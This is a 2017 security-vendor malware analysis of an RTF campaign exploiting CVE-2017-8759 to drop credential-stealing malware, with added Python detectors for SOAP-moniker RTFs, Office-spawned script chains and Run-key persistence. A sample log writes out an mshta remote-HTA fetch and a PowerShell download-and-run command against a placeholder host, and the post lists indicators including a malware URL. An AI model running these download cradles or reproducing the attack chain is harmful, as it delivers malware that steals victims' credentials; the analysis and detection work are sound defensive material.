16 October 2017

A recent .NET Framework zero-day vulnerability (CVE-2017-8759) is dropping Infostealer malware: an analysis by Quick Heal Security Labs

Written by Pradeep Kulkarni

The .NET Framework Remote Code Execution Vulnerability (CVE-2017-8759) is a code injection vulnerability in the SOAP WSDL parser of the .NET Framework. It was a zero-day when it was first spotted in the wild, and Quick Heal Security Labs released an advisory in September 2017 to address it. The WSDL parser generates source code from the WSDL definition it receives and compiles that code at runtime; because content taken from the WSDL is not properly validated before it is placed in the generated code, an attacker who controls the SOAP response can inject arbitrary code and have it executed when the parser handles that response. Microsoft patched the vulnerability on 12 September 2017. Quick Heal Security Labs is observing an ongoing malspam campaign that exploits it: the campaign uses a malicious RTF file as an attachment, which exploits CVE-2017-8759 to deliver Infostealer malware.

Attack Chain

Fig 1. Attack Chain

Technical details

This vulnerability (CVE-2017-8759) is triggered by improper handling of a SOAP WSDL response and leads to remote code execution. Attackers are using crafted RTF files to exploit it. The RTF file contains an embedded OLE object that carries the SOAP Moniker CLSID together with a link to a remotely hosted SOAP WSDL definition file, as shown in Fig 2. In this case, the attacker hosted all payloads on a compromised WordPress website.

Fig 2. RTF doc with embedded OLE object points to WSDL SOAP definition
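The RTF layout just described, an OLE object whose data carries the SOAP moniker CLSID and a "soap:wsdl=" link, can be checked for without opening the document in Word. The following scanner is an added example written for this post, not code from Quick Heal Security Labs. It assumes the SOAP moniker CLSID {ECABB0C7-7F19-11D2-978E-0000F8757E2A}, a value taken from public write-ups of this CVE rather than from the post, and it builds its own sample RTF with a placeholder URL; the sample only mimics the shape of Fig 2 and is not a working exploit.

```python
"""
Scan an RTF document for an embedded OLE object that references the SOAP
moniker, the trigger for CVE-2017-8759, and pull out the linked WSDL URL.

Assumptions (not from the post): the SOAP moniker CLSID value below comes
from public write-ups of this CVE; the sample RTF is constructed for the demo
and the URL in it is a placeholder, not the campaign's real host.
"""
from __future__ import annotations

import binascii
import re
import uuid

# CLSID_SoapMoniker as it appears inside OLE data: GUIDs are stored little-endian.
SOAP_MONIKER_CLSID = uuid.UUID("ecabb0c7-7f19-11d2-978e-0000f8757e2a")
SOAP_MONIKER_BYTES = SOAP_MONIKER_CLSID.bytes_le

# \objdata holds the OLE object as a hex dump that Word wraps across lines.
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")
# The moniker display name is "soap:wsdl=<url>"; URL characters per RFC 3986.
URL_CHARS = rb"[A-Za-z0-9._~:/?#@!$&'()*+,;=%-]+"
WSDL_RE = re.compile(rb"soap:wsdl=(" + URL_CHARS + rb")", re.IGNORECASE)


def extract_objdata_blobs(rtf: bytes) -> list[bytes]:
    """Return the decoded binary payload of every \\objdata group in the RTF."""
    blobs = []
    for match in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(rb"\s+", b"", match.group(1))
        if len(hexdata) % 2:            # odd nibble count: drop the dangling one
            hexdata = hexdata[:-1]
        try:
            blobs.append(binascii.unhexlify(hexdata))
        except binascii.Error:
            continue                    # not hex after all; skip this group
    return blobs


def find_soap_monikers(rtf: bytes) -> list[dict]:
    """Flag objects that carry the SOAP moniker CLSID and/or a soap:wsdl= link."""
    findings = []
    for index, blob in enumerate(extract_objdata_blobs(rtf)):
        has_clsid = SOAP_MONIKER_BYTES in blob
        urls = set()
        # The moniker string is usually UTF-16LE; stripping NULs lets the ASCII
        # regex match it too, at the cost of some noise from binary bytes.
        for view in (blob, blob.replace(b"\x00", b"")):
            for match in WSDL_RE.finditer(view):
                urls.add(match.group(1).decode("ascii", "replace"))
        if has_clsid or urls:
            findings.append({"object": index, "soap_clsid": has_clsid,
                             "wsdl_urls": sorted(urls)})
    return findings


def build_sample_rtf(wsdl_url: str) -> bytes:
    """Constructed sample: a blob with the SOAP moniker CLSID followed by a
    UTF-16LE 'soap:wsdl=<url>' string, hex-encoded into an \\objdata group.
    It only mimics the shape shown in Fig 2; it is not a working exploit."""
    moniker = f"soap:wsdl={wsdl_url}".encode("utf-16-le") + b"\x00\x00"
    blob = b"\x01\x05\x00\x00\x02\x00\x00\x00" + SOAP_MONIKER_BYTES + moniker + b"\x00" * 8
    hexdata = binascii.hexlify(blob)
    wrapped = b"\n".join(hexdata[i:i + 78] for i in range(0, len(hexdata), 78))
    return (b"{\\rtf1\\ansi\n{\\object\\objautlink{\\*\\objdata\n"
            + wrapped + b"\n}}\n\\par Invoice attached.}\n")


if __name__ == "__main__":
    sample = build_sample_rtf("http://compromised-site.example/wp-admin/def.wsdl")
    for hit in find_soap_monikers(sample):
        print(hit)
```

Two caveats for real samples: attackers routinely pad or obfuscate the \objdata hex with stray control words and odd whitespace, so a production scanner should tokenize the RTF properly (rtfobj from oletools does this) rather than rely on one regex, and a match on the CLSID alone is enough to quarantine the file even when no URL is recovered.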

RTF exploit analysis

The attack in this campaign starts with a spam email carrying the exploit RTF document as an attachment. The RTF file has contents similar to those shown in Fig 2. When the RTF is opened by winword.exe, Word resolves the embedded SOAP moniker and issues an HTTP request for the malicious SOAP WSDL definition hosted on the compromised website, as shown in Fig 3.

Fig 3. HTTP Request to SOAP WSDL definition

In response, the WSDL definition is downloaded and processed by the WSDL parser module, as shown in Fig 4.

Fig 4. SOAP WSDL response with injected code

Fig 4 shows the injected code that the WSDL SOAP parser executes; because the parser does not properly validate the content it takes from the WSDL, the injected code ends up in the generated code that it compiles and runs. The injected code then downloads and executes the remotely hosted "toZ.hta" file with the help of "mshta.exe". This .hta script is obfuscated: Fig 5 shows the obfuscated script and Fig 6 shows the script after deobfuscation.

Fig 5. Obfuscated HTA script

Fig 6. Deobfuscated part of HTA script

As the deobfuscated script shows, powershell.exe is executed to download and run the malware "Image0072.exe" from the compromised website.
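The chain described in this section, winword.exe fetching the WSDL, then mshta.exe fetching the remote .hta, then powershell.exe downloading and running the payload, leaves a recognisable parent/child trail in process-creation telemetry. The detection logic below is an added example, not Quick Heal Security Labs' code. The log records are constructed Sysmon-style events with placeholder hostnames, not captures from the campaign, and the csc.exe rule goes beyond the post: public analyses of CVE-2017-8759 note that the WSDL parser compiles the generated C# with csc.exe, so Word spawning the compiler is an extra signal worth alerting on.

```python
"""
Detection rules for the process chain WINWORD.EXE -> mshta.exe -> powershell.exe
(download cradle), run over constructed Sysmon-style process-creation events.
Added example; the events and hostnames below are made up for the demo.
"""
from __future__ import annotations

import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
# Common PowerShell download/launch idioms seen in HTA-delivered droppers.
CRADLE_RE = re.compile(
    r"downloadfile|downloadstring|net\.webclient|invoke-webrequest|\biwr\b|"
    r"invoke-expression|\biex\b|-enc(odedcommand)?\b|frombase64string", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)

# Constructed sample log: one pipe-delimited key=value record per event.
SAMPLE_LOG = [
    r"EventID=1|ProcessId=100|ParentProcessId=1|Image=C:\Windows\explorer.exe|ParentImage=C:\Windows\System32\userinit.exe|CommandLine=explorer.exe",
    r'EventID=1|ProcessId=200|ParentProcessId=100|Image=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|ParentImage=C:\Windows\explorer.exe|CommandLine="WINWORD.EXE" /n invoice.rtf',
    r"EventID=1|ProcessId=300|ParentProcessId=200|Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe|ParentImage=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|CommandLine=csc.exe /noconfig /fullpaths @C:\Users\u\AppData\Local\Temp\h1k2.cmdline",
    r"EventID=1|ProcessId=400|ParentProcessId=200|Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|CommandLine=mshta http://compromised-site.example/wp-admin/toZ.hta",
    r"EventID=1|ProcessId=500|ParentProcessId=400|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Windows\System32\mshta.exe|CommandLine=powershell -w hidden (New-Object Net.WebClient).DownloadFile('http://compromised-site.example/wp-admin/Image0072.exe','C:\Users\u\AppData\Local\Temp\Image0072.exe');Start-Process $env:TEMP\Image0072.exe",
    # Benign: an admin running PowerShell interactively from Explorer.
    r"EventID=1|ProcessId=600|ParentProcessId=100|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=powershell Get-ChildItem",
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> dict:
    """'k=v|k=v' record -> dict (keys: ProcessId, ParentProcessId, Image, ...)."""
    return dict(field.split("=", 1) for field in line.split("|"))


def ancestry(by_pid: dict, event: dict, max_depth: int = 8) -> list[str]:
    """Image basenames from this process upward: [child, parent, grandparent, ...]."""
    chain = [basename(event["Image"])]
    current = event
    for _ in range(max_depth):
        parent = by_pid.get(current["ParentProcessId"])
        if parent is None:                      # parent started before the log window
            chain.append(basename(current["ParentImage"]))
            break
        chain.append(basename(parent["Image"]))
        current = parent
    return chain


def evaluate(lines: list[str]) -> list[tuple[str, str, str]]:
    """Return (rule, pid, chain) for every event that trips a rule."""
    events = [parse_event(line) for line in lines]
    by_pid = {ev["ProcessId"]: ev for ev in events}
    alerts = []
    for ev in events:
        pid = ev["ProcessId"]
        child, parent = basename(ev["Image"]), basename(ev["ParentImage"])
        cmd = ev.get("CommandLine", "")
        chain = ancestry(by_pid, ev)
        hits = []
        if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
            hits.append("office_spawns_script_host")
        if parent in OFFICE_APPS and child == "csc.exe":
            hits.append("office_spawns_csc")     # WSDL parser compiling injected C#
        if child == "mshta.exe" and URL_RE.search(cmd):
            hits.append("mshta_remote_hta")
        if child == "powershell.exe" and CRADLE_RE.search(cmd):
            hits.append("powershell_download_cradle")
        # Office further up the tree (e.g. winword -> mshta -> powershell).
        if child in SCRIPT_HOSTS and parent not in OFFICE_APPS and OFFICE_APPS & set(chain[2:]):
            hits.append("office_in_ancestry")
        alerts.extend((rule, pid, " <- ".join(chain)) for rule in hits)
    return alerts


if __name__ == "__main__":
    for rule, pid, chain in evaluate(SAMPLE_LOG):
        print(f"{rule:28} pid={pid:<4} {chain}")
```

The ancestry walk is what turns three individually noisy rules into a high-confidence one: an interactive PowerShell session (pid 600 in the sample) trips nothing, while the same binary two hops below WINWORD.EXE does. The cradle regex is deliberately broad and expects decoded command lines; if your telemetry only records the encoded form, decode -EncodedCommand arguments before matching.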

Payload Analysis

The downloaded "Image0072.exe" is a .NET executable obfuscated with a custom obfuscator. It hides two malicious components inside bitmap resources in the form of compressed and encrypted data. Upon execution it decrypts and decompresses the first module, 'rp.dll'. The second module, which is the actual Infostealer, is decrypted and decompressed by rp.dll and is created with a random name.

Overview of Infostealer Components

Fig 7. Malware Components

rp.dll component

It copies "Image0072.exe" to %APPDATA% and sets it to auto-execute by creating a "Run" entry in the registry that points to the copy. It then creates a new process named "Image0072.exe", decrypts and decompresses the <random name>.exe component, and injects it into that newly created "Image0072.exe" process, so the Infostealer runs under the dropper's own name rather than as a separate file on disk.
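The persistence step above, a Run-key value pointing at a copy of the dropper under %APPDATA%, is cheap to triage on a suspect host. The checker below is an added example, not the post's or the malware's code. It assumes nothing about the campaign beyond what the paragraph states; the Run-key values and environment it runs on here are constructed, and the only real registry access is the optional winreg reader for use on a Windows machine.

```python
"""
Triage Run/RunOnce autostart entries whose image lives in a user-writable
location such as %APPDATA%, %LOCALAPPDATA% or %TEMP%.  Added example; the
sample entries and environment are constructed, not taken from a real host.
"""
from __future__ import annotations

import re

# Constructed environment and registry values for an offline demo.
SAMPLE_ENV = {
    "APPDATA": r"C:\Users\victim\AppData\Roaming",
    "LOCALAPPDATA": r"C:\Users\victim\AppData\Local",
    "TEMP": r"C:\Users\victim\AppData\Local\Temp",
    "USERPROFILE": r"C:\Users\victim",
}
RUN = r"Software\Microsoft\Windows\CurrentVersion\Run"
SAMPLE_ENTRIES = [
    ("HKCU\\" + RUN, "Image0072", r'"C:\Users\victim\AppData\Roaming\Image0072.exe"'),
    ("HKCU\\" + RUN, "OneDrive", r'"C:\Users\victim\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("HKLM\\" + RUN, "SecurityHealth", r"%windir%\system32\SecurityHealthSystray.exe"),
    ("HKCU\\" + RUN, "Updater", r"%APPDATA%\svc\update.exe -s"),
]


def expand(path: str, env: dict) -> str:
    """Expand %VAR% references using the supplied environment (unknown ones stay)."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1).upper(), m.group(0)), path)


def image_path(value: str) -> str:
    """Pull the executable path out of a Run value: quoted, or up to the first .exe."""
    match = re.match(r'\s*"([^"]+)"|\s*(\S+?\.exe)', value, re.I)
    return (match.group(1) or match.group(2)) if match else value.strip()


def user_writable_roots(env: dict) -> list[str]:
    roots = [env[k] for k in ("APPDATA", "LOCALAPPDATA", "TEMP", "TMP") if k in env]
    if "USERPROFILE" in env:
        roots.append(env["USERPROFILE"] + r"\Downloads")
    roots += [r"C:\Users\Public", r"C:\ProgramData"]
    return [r.lower().rstrip("\\") + "\\" for r in roots]


def suspicious_run_entries(entries: list[tuple[str, str, str]], env: dict) -> list[tuple[str, str, str]]:
    """Return (key, name, resolved path) for entries launched from user-writable dirs."""
    roots = user_writable_roots(env)
    findings = []
    for key, name, value in entries:
        path = expand(image_path(value), env).lower()
        if any(path.startswith(root) for root in roots):
            findings.append((key, name, path))
    return findings


def read_run_keys() -> list[tuple[str, str, str]]:
    """Windows only: enumerate HKCU/HKLM Run and RunOnce values via winreg."""
    import winreg
    out = []
    for hive_name, hive in (("HKCU", winreg.HKEY_CURRENT_USER), ("HKLM", winreg.HKEY_LOCAL_MACHINE)):
        for sub in (RUN, RUN + "Once"):
            try:
                key = winreg.OpenKey(hive, sub)
            except OSError:
                continue
            with key:
                index = 0
                while True:
                    try:
                        name, value, _ = winreg.EnumValue(key, index)
                    except OSError:         # no more values
                        break
                    out.append((hive_name + "\\" + sub, name, str(value)))
                    index += 1
    return out


if __name__ == "__main__":
    import os
    try:
        entries, env = read_run_keys(), dict(os.environ)
    except ImportError:                     # not on Windows: use the constructed data
        entries, env = SAMPLE_ENTRIES, SAMPLE_ENV
    for key, name, path in suspicious_run_entries(entries, env):
        print(f"{key}\\{name} -> {path}")
```

Note what the sample output includes: OneDrive is flagged alongside the dropper, because legitimate per-user installers also autostart from %LOCALAPPDATA%. A user-writable launch path is a triage signal to be combined with the file's signature status, hash (compare against the IoCs at the end of the post) and creation time, not a verdict on its own.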

<random name>.exe

This component performs the actual Infostealer tasks. It steals credentials saved in the victim's browsers, logs keystrokes and takes screenshots. The stolen data is then sent to the attacker by e-mail or FTP. During our analysis we did not observe stolen data being sent over FTP, but we did find the e-mail address, and its credentials, to which the data was being pushed.

To make analysis harder, the raw strings related to the stealing activity are kept encrypted with AES and decrypted only at runtime.

Multistage operation, obfuscation, encryption and compression, and anti-VM techniques are all used to hinder analysis and evade static detection.

Stolen data at attacker mailbox

The following images show stolen data in the attacker's mailbox.

Fig 8. Attacker's Mailbox

Fig 9. Stolen user credentials

Fig 10. Stolen Keystrokes

Thus the victim’s activity is continuously monitored and recorded by the malware and sent to the attacker.

This is another incident in which we have seen a recent zero-day exploit integrated rapidly into an ongoing malicious campaign. We strongly advise our users to stay protected by applying the latest security updates released by Microsoft and by keeping their Quick Heal/Seqrite products updated.

Indicators of compromise

MD5:
9A8DE9ABC33FD8EE8BCA3D3673A92915
BEF17C7B359BCA2285311FB335951DD4

URL:
bali-accommodation[.]co/wp-admin/Image0072[.]exe

Also Read

http://blogs.quickheal.com/cve-2017-8759-net-framework-remote-code-execution-vulnerability-analysis-quick-heal-security-labs/

http://www.seqrite.com/blog/cve-2017-8759-net-framework-remote-code-execution-vulnerability/

Subject Matter Experts

  • Pawan Chaudhari, Amar Patil, Aniruddha Dolas | Quick Heal Security Labs

About Pradeep Kulkarni

Pradeep Kulkarni is leading the IPS team in Quick Heal Technologies Limited. Having worked in the IT security industry for over 11 years, he has worked on various...
